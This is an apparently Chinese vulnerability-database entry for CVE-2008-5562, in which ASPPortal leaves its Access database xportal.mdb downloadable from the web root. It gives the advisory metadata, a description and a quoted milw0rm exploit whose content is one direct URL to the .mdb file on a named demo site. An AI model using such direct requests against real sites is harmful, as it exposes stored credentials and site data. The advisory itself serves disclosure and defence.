ASPPortal xportal.mdb敏感信息泄漏漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116956 漏洞类型 权限许可和访问控制
发布时间 2008-12-06 更新时间 2008-12-15
CVE编号 CVE-2008-5562 CNNVD-ID CNNVD-200812-247
漏洞平台 ASP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/7361
https://www.securityfocus.com/bid/84678
https://cxsecurity.com/issue/WLB-2008120122
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-247
|漏洞详情
ASPPortal是一款基于ASP的使用ACCESS数据库存储站点信息的WEB构建工具,脚本还包括方便使用的管理接口。ASPPortal在WEB根目录下储存敏感信息,但没有给予足够的访问控制,这会允许远程攻击者可以借助一个对xportal.mdb的直接请求来下载数据库文件。
|漏洞EXP
[~] ASPAPPS Portal DD Remote Vuln.
[~]
[~] script: http://www.aspapps.com
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] -----------------------------------------------------------


exp for demo: ( DD )

http://demo.merlix.com/portal/xportal.mdb

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke 
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-12-06]
|受影响的产品
Aspapps Aspportal Nil
|参考资料

来源:MILW0RM
名称:7361
链接:http://www.milw0rm.com/exploits/7361
来源:SREASON
名称:4727
链接:http://securityreason.com/securityalert/4727